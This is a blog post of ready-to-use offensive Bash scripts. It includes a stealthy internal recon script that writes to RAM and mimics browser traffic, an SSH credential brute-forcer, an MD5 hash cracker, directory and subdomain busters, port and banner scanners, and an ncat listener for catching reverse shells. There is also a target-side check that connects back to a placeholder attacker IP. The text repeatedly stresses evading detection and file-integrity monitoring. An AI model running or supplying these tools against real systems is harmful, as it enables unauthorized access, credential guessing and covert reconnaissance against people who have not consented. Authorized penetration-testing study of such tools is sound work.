Bash Scripts Stash
Dec 19, 2025
- SSH brute-forcing with sshpass
- Vulnerability scanner
- Nmap automator
- Log parser
- Listen with netcat
- Hash cracker
- Banner grabber
- Web dir buster
- Port scanner
- Subdomain scanner
Bash scripting is highly valuable in offensive security because it leverages the principle of living off the land, using native tools and interpreters already present on target systems rather than introducing foreign binaries that could trigger defenses. This approach minimizes the operational footprint and helps maintain stealth, as scripts blend into normal administrative activity. Bash enables rapid automation of reconnaissance, privilege escalation checks, and lateral movement using built-in utilities like curl, wget, grep, and awk, reducing dependency on external frameworks. By chaining these commands in scripts, attackers can execute complex tasks without dropping large executables, making detection harder for signature-based defenses. Ultimately, Bash scripting aligns with low-noise, low-risk methodologies, allowing operators to remain covert while achieving objectives efficiently.
For example, consider the following code. Why is it "stealthy"?
- Living off the land: Uses utilities commonly present on Linux systems (arp, curl, ss, awk). No external binaries are dropped.
- Low operating footprint: Writes to /dev/shm (RAM‑backed) to avoid persistent disk artifacts and reduce I/O.
- Noise reduction: Uses HEAD requests, short timeouts, and random jitter; avoids aggressive port scans—prefers passive discovery via ARP.
- Blends with admin behaviour: User‑Agent + headers resemble normal browser/admin traffic; slow cadence reduces anomaly spikes.
#!/usr/bin/env bash
# stealth_enum.sh — low-noise internal web/service reconnaissance
set -Eeuo pipefail

# In-memory scratch space (cleared on reboot on most Linux systems)
SCRATCH=/dev/shm/lotl
mkdir -p "$SCRATCH"

# Quiet logging helper
log() { printf '%s %s\n' "$(date +'%H:%M:%S')" "$*" >> "$SCRATCH/enum.log"; }

# Gentle jitter: 0.7–2.3s
jitter() {
  awk -v seed="$RANDOM" 'BEGIN{srand(seed); print 0.7 + rand()*1.6}'
}

# Candidate hosts from local ARP cache (passive discovery, no scans)
HOSTS_FILE="$SCRATCH/hosts.txt"
arp -n | awk 'NR>1 && $1 ~ /^[0-9.]+$/ {print $1}' | sort -u > "$HOSTS_FILE"

# If none found, quietly exit
[[ -s "$HOSTS_FILE" ]] || { log "No ARP hosts found; exiting."; exit 0; }

# Browser-like User-Agent; HEAD requests keep transfers minimal
UA="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122 Safari/537.36"

# Enumerate common web ports very slowly and capture minimal metadata
while read -r host; do
  for port in 80 443 8080 8443; do
    sleep "$(jitter)"
    # 1) TCP reachability with minimal timeout; avoids long hangs
    if timeout 2 bash -c "</dev/tcp/$host/$port" 2>/dev/null; then
      log "open $host:$port"
      # 2) Gentle banner: HEAD with compression and short timeout
      #    '|| true' keeps set -e/pipefail from aborting when a port is open but not speaking HTTP
      timeout 3 curl -sS --compressed \
        -A "$UA" \
        -H 'Accept: text/html,*/*;q=0.8' \
        -I "http://$host:$port/" 2>/dev/null \
        | awk 'BEGIN{h="";t="";s=""}
               tolower($1)=="server:"{s=$0}
               tolower($1)=="x-powered-by:"{t=$0}
               tolower($1)=="location:"{h=$0}
               END{if(s!="")print s; if(t!="")print t; if(h!="")print h}' \
        >> "$SCRATCH/web_banners.txt" || true
    fi
  done
done < "$HOSTS_FILE"

# Optional: correlate local listeners without scanning (reads kernel sockets)
# Captures only service names and ports; no payloads
ss -tnlp 2>/dev/null \
  | awk 'NR>1 {split($4,a,":"); if (a[length(a)] ~ /^[0-9]+$/) print a[length(a)], $NF}' \
  >> "$SCRATCH/listeners.txt"

# Minimal terminal output; artifacts kept in-memory
echo "Stealth enum complete. In-memory results:"
echo " - $SCRATCH/enum.log (open hosts/ports)"
echo " - $SCRATCH/web_banners.txt (server/x-powered-by/location headers)"
echo " - $SCRATCH/listeners.txt (local listeners)"

# Clean-up trap (optional: uncomment to delete the artifacts immediately on exit)
# trap 'rm -rf "$SCRATCH"' EXIT
So let's dive into some more ready-to-use examples...
SSH brute-forcing with sshpass
Performs a credential brute force attempt against an SSH service on a given host by trying every combination of usernames in users.txt and passwords in passwords.txt. It uses sshpass to non‑interactively supply passwords to the ssh client.
⚠️ Legal/ethical note: Only run brute‑force tests against systems you own or have explicit written permission to test. Unauthorized access attempts are illegal and may trigger security controls.
#!/bin/bash
# Save as ssh_brute.sh. Requires 'sshpass': sudo apt-get install sshpass
# Create users.txt and passwords.txt
if [ -z "$1" ]; then
  echo "Usage: ./ssh_brute.sh <host>"
  exit 1
fi

HOST=$1
USERS="users.txt"
PASSWORDS="passwords.txt"

while read -r user; do
  while read -r pass; do
    echo "[*] Trying $user:$pass..."
    # sshpass provides the password to the ssh command
    # -o StrictHostKeyChecking=no prevents prompts about new hosts
    # -o ConnectTimeout=5 keeps a dead host from stalling the loop
    # The 'true' command at the end just exits successfully if login works
    # '</dev/null' stops ssh from swallowing the loop's stdin (the wordlists)
    if sshpass -p "$pass" ssh -o StrictHostKeyChecking=no -o ConnectTimeout=5 \
        "$user@$HOST" "true" </dev/null; then
      echo "[+] Success! $user:$pass"
      exit 0
    fi
  done < "$PASSWORDS"
done < "$USERS"
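A possible lab run, sketched with placeholder values (the usernames, passwords, and host below are stand-ins; the target must be one you are authorized to test):

# Minimal lab setup (placeholder usernames, passwords, and host)
printf '%s\n' root admin ubuntu > users.txt
printf '%s\n' password 123456 letmein > passwords.txt
./ssh_brute.sh 192.0.2.50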
Vulnerability scanner
This script takes a single argument, a URL (e.g., http://example.com). It sends a HEAD request (curl -I) to fetch only HTTP response headers, then extracts the Server header line (e.g., Server: Apache/2.4.29 (Ubuntu)). It then checks that header against:
- A specific version marker you’ve labeled as vulnerable: Apache/2.4.29.
- A novelty case for Python’s built‑in server: SimpleHTTP/0.6 Python.
- Finally, it prints a verdict based on the match (vulnerable, cute message, or not found).
#!/bin/bash
# Save as vuln_scanner.sh
if [ -z "$1" ]; then
  echo "Usage: ./vuln_scanner.sh <url>"
  exit 1
fi

URL=$1
VULNERABLE_SERVER="Apache/2.4.29"

# 'curl -I' sends a HEAD request to get only headers
# '-s' silences any output
# 'grep -i' makes the search case-insensitive
SERVER_HEADER=$(curl -s -I "$URL" | grep -i "Server:")

echo "[*] Target server header: $SERVER_HEADER"

# Check if the vulnerable string is within the header
if [[ "$SERVER_HEADER" == *"$VULNERABLE_SERVER"* ]]; then
  echo "[!] VULNERABLE: Found outdated server version: $SERVER_HEADER"
elif [[ "$SERVER_HEADER" == *"SimpleHTTP/0.6 Python"* ]]; then
  echo "[+] You are running a simple HTTP server with python, how cute!"
else
  echo "[-] Not found to be vulnerable to this specific check."
fi
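A quick way to exercise the novelty branch locally, assuming Python 3 is available (the port is arbitrary):

# In one terminal: start Python's built-in web server (any free port works)
python3 -m http.server 8000

# In another terminal: point the scanner at it; the Server header contains
# "SimpleHTTP/0.6 Python", so the script's novelty branch should fire
./vuln_scanner.sh http://127.0.0.1:8000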
Nmap automator
Why you’d automate Nmap like this:
- Repeatability & auditability: Engagements often need the same baseline scans run multiple times (daily, per sprint, or pre/post‑patch). Automating from a targets.txt list guarantees consistent methodology, while per‑host files produce a clear audit trail you can reference in reports.
- Organization and correlation: The nmap_scans/<target>_scan.txt pattern makes it trivial to:
- Diff results between scan runs (git diff, diff, meld).
- Grep across all outputs for particular CVE‑prone versions or services. This supports rapid triage and prioritization (see the triage sketch after the script below).
- Version intelligence for vulnerability mapping: -sV gathers service banners/versions. That feeds downstream checks (e.g., quick “is version ≤ X” matches), making it faster to map to known vulnerabilities during recon/validation phases without immediately pulling in heavier scanners.
- Operational safety vs speed: -T4 is a balanced timing profile. It’s quicker than the default, but less likely to overwhelm fragile services or trigger rate‑limit alarms compared to -T5. This is useful when you need reasonable speed in approved testing windows while still being considerate of target stability.
- Low complexity, easy handoff: A single Bash file with targets.txt is easy to share with teammates, slot into CI pipelines, or schedule with cron. This helps operationalize recon as part of secure development practices (e.g., nightly checks of dev/staging).
#!/bin/bash
# Save as nmap_automator.sh
# Create a file named targets.txt
TARGET_FILE="targets.txt"
OUTPUT_DIR="nmap_scans"

mkdir -p "$OUTPUT_DIR"  # -p prevents error if directory already exists

while read -r target; do
  # Skip empty lines
  if [ -z "$target" ]; then continue; fi

  echo "[*] Scanning $target..."
  OUTPUT_FILE="$OUTPUT_DIR/${target}_scan.txt"

  # -oN saves the output in normal format
  nmap -sV -T4 -oN "$OUTPUT_FILE" "$target"

  echo "[+] Scan for $target complete. Results saved to $OUTPUT_FILE"
done < "$TARGET_FILE"
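And the triage sketch referenced in the diff/grep bullet above. It assumes the nmap_scans/ directory produced by the script plus a hypothetical nmap_scans_prev/ copy of an earlier run; the version strings in the grep are illustrative placeholders, not a vetted CVE list:

#!/bin/bash
# triage_scans.sh — quick triage over nmap_automator.sh output (sketch)
# Assumes: nmap_scans/ from the current run, nmap_scans_prev/ as a saved copy of an earlier run.

# 1) Grep every normal-format output for service versions worth a closer look
#    (patterns below are illustrative only).
grep -HinE 'Apache/2\.4\.29|OpenSSH_7\.|vsftpd 2\.3\.4' nmap_scans/*_scan.txt

# 2) Diff this run against the previous one, per host, to spot new or changed ports.
for f in nmap_scans/*_scan.txt; do
  prev="nmap_scans_prev/$(basename "$f")"
  [ -f "$prev" ] && diff -u "$prev" "$f" | grep -E '^[+-][0-9]+/tcp' || true
done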
Log parser
This script contains some red-hot Linux commands so I'll break it down, line‑by‑line:
- Existence check: If access.log isn't present, exit with an error.
- Message: Prints a header describing the upcoming summary.
- Pipeline:
- awk '{print $1}' "$LOG_FILE" — extracts the first column from each line, which in common web server access logs (e.g., Nginx/Apache) is the client IP.
- sort — sorts the IPs so identical values are adjacent.
- uniq -c — collapses duplicates and counts occurrences per unique IP.
- sort -nr — numerically sorts the counts in descending order (most frequent first).
- head -n 10 — shows the top 10 most active IPs hitting the server.
Why you’d do this (offensive & defensive context):
- Triage "noisy" sources quickly: During a test, you often want to know which IPs generate the most requests—good for identifying brute‑force origins, scanners, or misconfigured health checks.
- Anomaly detection: A few IPs dominating traffic may indicate credential stuffing, cart enumeration, or path fuzzing activity.
- Operationally lightweight: Uses standard Unix tools available on most systems—no external dependencies, fast, easy to run in constrained environments.
- Evidence collection: Produces a clear top‑N list suitable for reports or follow‑up actions (blocking, rate limiting, deeper inspection).
#!/bin/bash
# Save as log_parser.sh
# Create a sample access.log file
LOG_FILE="access.log"

if [ ! -f "$LOG_FILE" ]; then
  echo "Error: $LOG_FILE not found."
  exit 1
fi

echo "Top 10 most frequent IP addresses:"

# 'awk' prints the first field (the IP), 'sort' groups them,
# 'uniq -c' counts unique occurrences, 'sort -nr' sorts numerically in reverse,
# and 'head -n 10' shows the top 10.
awk '{print $1}' "$LOG_FILE" | sort | uniq -c | sort -nr | head -n 10
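Building on the brute-force triage point above, a small variant can focus on failed or forbidden requests instead of raw volume. This is a sketch that assumes the common/combined log format, where the HTTP status code is the 9th whitespace-separated field; adjust $9 if your format differs:

#!/bin/bash
# failed_auth_top.sh — hedged variant of log_parser.sh (sketch)
# Assumption: access.log is in common/combined log format (status code in field 9).
LOG_FILE="access.log"

echo "Top 10 IPs generating 401/403 responses (possible brute-force or forced browsing):"
awk '$9 == 401 || $9 == 403 {print $1}' "$LOG_FILE" | sort | uniq -c | sort -nr | head -n 10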
Listen with netcat
Why you’d do this (offensive‑security context):
- Catch reverse shells during exploitation: When exploiting a remote service or running a payload that calls back to your machine, you need a listener to receive that connection and interact with the shell or data stream.
- Network path validation: Before firing a full payload, you can verify whether the target can reach your port (egress rules, NAT, firewall path) by initiating a connection from the target (ncat your_ip 4444) and confirming you see/receive data. A target‑side check is sketched after the script below.
- Low‑footprint troubleshooting: Ncat is tiny, ubiquitous on many toolkits, and doesn’t require complex configuration—useful for quick tests in constrained environments.
- Multi‑session collection: With -k, you can accept multiple callbacks without restarting the listener. Useful when testing multiple hosts or repeating the exploit.
#!/bin/bash
# Save as listener.sh
# Uses netcat (ncat) to create a powerful listener.
if ! command -v ncat &> /dev/null; then
  echo "netcat (ncat) is not installed. Please install it to use this script."
  exit 1
fi

PORT=4444

echo "[*] Listening on port $PORT..."

# -l for listen mode, -v for verbose, -p for port, -n to skip DNS
# Some versions of nc use -e to execute a program on connect, but for a simple
# interactive shell, this is the most common and reliable form.
# '-k' - keep listening so multiple callbacks can be caught without restarting
ncat -k -lvnp "$PORT"
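The target-side reachability check mentioned above can be done with the same built-ins used elsewhere in this post. A minimal sketch, where 192.0.2.10 is a placeholder for the box running listener.sh:

#!/bin/bash
# egress_check.sh — run from the target side to confirm it can reach your listener (sketch)
# YOUR_IP is a placeholder for the address listener.sh is running on; 4444 matches its port.
YOUR_IP="192.0.2.10"
PORT=4444

# Bash's /dev/tcp pseudo-device opens a TCP connection; timeout keeps it bounded.
if (timeout 3 bash -c "echo 'egress test' > /dev/tcp/$YOUR_IP/$PORT") &>/dev/null; then
  echo "[+] Callback path to $YOUR_IP:$PORT looks open"
else
  echo "[-] Could not reach $YOUR_IP:$PORT (blocked egress, NAT, or listener not running)"
fi

If the path is open, the listener side prints the connection details and the "egress test" line.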
Hash cracker
Performs a dictionary attack against a single MD5 hash. For each candidate password read from passwords.txt, it computes the MD5 digest and compares it to the target hash you provide on the command line. If any candidate matches, it prints the plaintext and exits.
⚠️ Ethical note: Only crack hashes that you own or have explicit written permission to test. Unauthorized cracking can be illegal and unethical.
#!/bin/bash
# Save as hash_cracker.sh
# Requires md5sum command
# sunshine = 0571749e2ac330a7455809c6b0e7af90
if [ -z "$1" ]; then
  echo "Usage: ./hash_cracker.sh <md5_hash>"
  exit 1
fi

HASH_TO_CRACK=$1
WORDLIST="passwords.txt"

while read -r password; do
  # 'echo -n' prevents a newline character from being part of the hash
  # 'cut' extracts just the hash part from the md5sum output
  GUESS=$(echo -n "$password" | md5sum | cut -d ' ' -f 1)
  if [ "$GUESS" == "$HASH_TO_CRACK" ]; then
    echo "[+] Password found: $password"
    exit 0
  fi
done < "$WORDLIST"

echo "[-] Password not found in list."
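To try it out, you can generate a test hash with the same md5sum pipeline the script uses and feed it back in (assuming 'sunshine' appears in passwords.txt):

# Generate a test MD5 hash, then run the cracker against it
echo -n "sunshine" | md5sum | cut -d ' ' -f 1
./hash_cracker.sh 0571749e2ac330a7455809c6b0e7af90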
Banner grabber
Why banner grabbing is useful
Banner grabbing is the practice of connecting to a service and reading its initial response string or headers to learn what software and version is running. This is valuable because:
- Rapid reconnaissance:
- Quickly fingerprints services (e.g., OpenSSH_9.3p2, Microsoft-IIS/10.0, Exim 4.x).
- Helps map the attack surface (which services, which versions) before heavier scans.
- Version‑based vulnerability mapping:
- Many banners expose versions. Matching versions to known CVEs lets you prioritize targets or validate findings faster.
- Example: an outdated Apache/2.4.29 banner suggests checking for historical issues and misconfigurations.
- Protocol verification and triage:
- Confirms you’re talking to the expected protocol on a given port (e.g., SMTP speaks 220 …, FTP speaks 220 …, SSH sends SSH-2.0-…).
- Distinguishes proxy/CDN vs origin behavior (helpful in web apps), guides next steps (HTTP request crafting, TLS tests, etc.).
- Low‑noise, low‑footprint:
- A simple TCP connect and single line read is far less noisy than full vulnerability scans.
- Fits “living off the land” principles: you can do it with built‑in tools (Bash /dev/tcp) or ubiquitous small utilities (netcat/ncat), reducing the chance of triggering signatures for large scanner payloads.
- Defensive hardening feedback:
- Banners often leak unnecessary information (exact versions). Noting exposed banners helps defenders decide where to suppress or sanitize headers (e.g., remove/modify Server headers in HTTP, or tune SSH VersionAddendum).
#!/bin/bash
# Save as banner_grabber.sh
if [ -z "$2" ]; then
  echo "Usage: ./banner_grabber.sh <ip> <port>"
  exit 1
fi

IP=$1
PORT=$2

# Use ncat (Nmap's netcat) if available, a powerful networking utility.
# '-v' for verbose,
# '-n' to skip DNS,
# '-w' connect timeout,
# '-i' idle timeout so the read doesn't hang.
# For banner grabbing we pipe an empty line and read whatever the service sends.
# (Note: '-z' would only test the connection and never read a banner, so it is not used here.)
if command -v ncat &> /dev/null; then
  echo "" | ncat -v -n -w 2 -i 2 "$IP" "$PORT"
else
  # Fallback to the /dev/tcp method if ncat isn't installed
  # 'exec 3<>' - opens a bidirectional file descriptor (3) to IP:PORT
  exec 3<>"/dev/tcp/$IP/$PORT"
  # Read the first line from the connection (3-second timeout so we don't hang)
  read -r -t 3 banner <&3
  echo "[+] Port $PORT Banner: $banner"
  # Close descriptor 3 for reading and writing
  exec 3<&-
  exec 3>&-
fi
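For protocol verification across several services at once, a thin wrapper around the script can help. A sketch, assuming banner_grabber.sh (above) sits in the current directory and is executable:

#!/bin/bash
# banner_sweep.sh — grab banners on a few common ports for one host (sketch)
# Assumes banner_grabber.sh is in the current directory and marked executable.
TARGET="${1:?Usage: ./banner_sweep.sh <ip>}"

for port in 21 22 25 80 443; do
  echo "--- $TARGET:$port ---"
  ./banner_grabber.sh "$TARGET" "$port"
done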
Web dir buster
Why you’d do directory/path discovery
- Attack surface mapping:
- Hidden or unlinked paths (e.g., /admin, /backup, /old, /api/v1, /debug) often expose functionality, data, or configuration you can leverage.
- Enumerating these paths early gives you a roadmap for follow‑up testing (auth checks, parameter manipulation, business logic flaws).
- Versioning & legacy endpoints
- Many apps keep older builds or staging folders online (e.g., /v2/, /beta/, /old/), which can include known vulnerabilities or weaker controls compared to the main app.
- Access control testing
- Responses like
401 Unauthorizedor403 Forbiddenindicate protected resources; these are priority targets for authorization bypass, IDOR, and misconfiguration tests.
- Low‑noise reconnaissance
- This approach is living off the land: a single
bash + curlpipeline, short timeouts, and no bulky scanner binaries. It blends with normal admin traffic and keeps your operating footprint small.
#!/bin/bash
# Save as web_dir_buster.sh
# Create a file named dir_list.txt
if [ -z "$1" ]; then
  echo "Usage: ./web_dir_buster.sh <target_url>"
  echo "Example: ./web_dir_buster.sh http://127.0.0.1"
  exit 1
fi

URL=$1
WORDLIST="dir_list.txt"

while read -r dir; do
  # 'curl' fetches the URL.
  # '-s' silences progress,
  # '-o' sends output to /dev/null,
  # and '-w' tells curl to print only the HTTP status code.
  # '--connect-timeout' handles hangs.
  STATUS=$(curl -s -o /dev/null -w "%{http_code}" --connect-timeout 3 "$URL/$dir")
  if [ "$STATUS" -ne 404 ]; then
    echo "[+] Found: $URL/$dir [Status: $STATUS]"
  fi
done < "$WORDLIST"
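If you don't have a wordlist handy, a tiny starter dir_list.txt can be created inline; the paths below are just the examples mentioned earlier in this section, and the target URL is a placeholder:

# Create a minimal starter wordlist (paths from the examples above), then run the buster
printf '%s\n' admin backup old api/v1 debug v2 beta > dir_list.txt
./web_dir_buster.sh http://127.0.0.1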
Port scanner
Performs a very lightweight TCP port reachability check against a handful of common ports on a single target host—using only Bash built‑ins and timeout. This is a full TCP connect probe (not a half‑open SYN scan), implemented entirely in Bash—no external scanners.
Why you’d do this (instead of using Nmap)
There are solid reasons to prefer a tiny, built‑in reachability check during certain phases of an engagement:
- Living off the land / minimal footprint
- No need to drop or install large tooling—only Bash (present on most Linux/UNIX targets and jump hosts) plus timeout.
- Reduces the chance of tripping software whitelists, inventory checks, or file‑integrity monitoring that flag “scanner binaries”.
- Stealthier operational profile
- A few targeted connect attempts on specific ports can blend with normal administrative traffic better than broad, aggressive scans.
- Useful when you’re validating reachability before launching a payload (e.g., confirming that 443 egress works for a callback).
- Speed & simplicity for quick checks
- You might only need to know “is any of 22/80/443/8080 open?” to decide the next move.
- One short connect per port with a 1‑second timeout is fast and clearly bounded.
- Scriptability & portability
- Bash one‑liners are easy to inline in other scripts, CI pipelines, or cloud-init steps.
- No XML/grepable outputs or additional flags to remember—just success/failure per port.
- Reduced signature / fewer heuristics triggered
- Nmap is powerful but may be associated with recognizable scan patterns, packet timings, and fingerprints if misconfigured.
- A minimalist connect test can be lower‑signal to anomaly‑based detection.
TL;DR: When you need a tiny, ephemeral, and low‑noise reachability probe, this approach is ideal. When you need depth (service/version detection, host discovery, NSE scripts), use Nmap.
#!/bin/bash
# Save as port_scanner.sh
if [ -z "$1" ]; then
  echo "Usage: ./port_scanner.sh <ip_address>"
  exit 1
fi

TARGET=$1
PORTS="21 22 80 443 8080"

echo "Scanning $TARGET..."

for port in $PORTS; do
  # This syntax sends nothing to the target but establishes a connection.
  # The timeout command prevents it from hanging for too long.
  # '(...)' - runs the command in a subshell, isolating it from the main script.
  # Bash has a special feature: '/dev/tcp/host/port' - writing to this pseudo-file
  # attempts to open a TCP connection to the given host ($TARGET) and port ($port).
  # '&>/dev/null' - silences all output from the subshell.
  (timeout 1 bash -c "echo > /dev/tcp/$TARGET/$port") &>/dev/null && echo "[+] Port $port is open"
done
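Since the probe is a single Bash expression, it also works as a one-liner you can inline in other scripts, as the scriptability bullet above suggests. A sketch with a placeholder address:

# Same probe as a one-liner (192.0.2.10 is a placeholder target)
timeout 1 bash -c 'echo > /dev/tcp/192.0.2.10/443' &>/dev/null && echo "[+] 443 reachable"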
Subdomain scanner
Enumerates subdomains for a given root domain using a wordlist and DNS lookups. Any entry that resolves (i.e., DNS returns an answer) is reported as "Found".
Why you’d do this (and when)
Subdomain enumeration expands your view of the attack surface:
- Find hidden assets: Internal dashboards, APIs, staging/beta sites, forgotten services, or legacy endpoints often live under distinct subdomains (e.g., jira.example.com, grafana.example.com, v1-api.example.com).
- Prioritize targets: Each discovered host can expose different ports/services, software stacks, and configurations—useful for triage and chaining attacks.
- Low‑noise recon: DNS queries are typically less intrusive than active web or port scans. They often blend with normal operational traffic and keep your operating footprint small.
- Quick validation: Before aggressive scanning, confirming which names resolve keeps follow‑up probes focused and efficient.
#!/bin/bash
# Save as subdomain_scanner.sh and run: chmod +x subdomain_scanner.sh
# Requires a subdomains.txt file
# -z = true if the argument has zero length (i.e., no domain was given)
if [ -z "$1" ]; then
  echo "Usage: ./subdomain_scanner.sh <domain>"
  exit 1
fi

DOMAIN=$1
WORDLIST="subdomains.txt"

# If the wordlist file does not exist, exit
if [ ! -f "$WORDLIST" ]; then
  echo "Error: $WORDLIST not found."
  exit 1
fi

while read -r sub; do
  # The 'host' command performs a DNS lookup. We silence output with &> /dev/null
  # '&&' means the second command only runs if the first succeeds
  # '&>' - send standard output and errors to /dev/null
  host "$sub.$DOMAIN" &> /dev/null && echo "[+] Found: $sub.$DOMAIN"
done < "$WORDLIST"
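If the resolved addresses would help with prioritization (as noted above), a hedged variant of the loop using dig (from the dnsutils/bind-utils package) could record them as well; it reuses the same subdomains.txt wordlist:

#!/bin/bash
# subdomain_scanner_ips.sh — variant that also records resolved IPs (sketch)
# Requires 'dig' and the same subdomains.txt wordlist as above.
DOMAIN="${1:?Usage: ./subdomain_scanner_ips.sh <domain>}"
WORDLIST="subdomains.txt"

while read -r sub; do
  # '+short' prints only the answer section (A records / CNAME targets), one per line
  ips=$(dig +short "$sub.$DOMAIN" A)
  # Only report names that actually resolved; join the answers onto one line
  [ -n "$ips" ] && printf '[+] %s -> %s\n' "$sub.$DOMAIN" "$(echo "$ips" | paste -sd ',' -)"
done < "$WORDLIST"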
Conclusion
Living off the land tactics are extremely prevalent in adversarial TTPs, as presented by BitDefender Labs research. While Bash scripting is not a frequently abused "tool" in itself, it demonstrates the principle of turning ordinary system resources to what would otherwise be nefarious purposes.
